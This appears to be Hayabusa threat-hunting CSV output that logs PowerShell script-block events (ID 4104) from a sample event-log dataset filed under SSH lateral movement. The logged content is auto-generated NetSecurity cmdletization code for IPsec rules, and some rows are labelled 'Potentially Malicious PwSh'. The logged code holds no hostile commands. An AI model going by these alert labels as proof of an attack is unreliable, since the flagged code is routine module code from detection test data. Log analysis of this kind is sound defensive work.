($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) 
$__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') 
-and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_quer",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"{Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] 
[ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] 
[ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) 
$__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and 
(@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_quer",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"yBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 
'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 
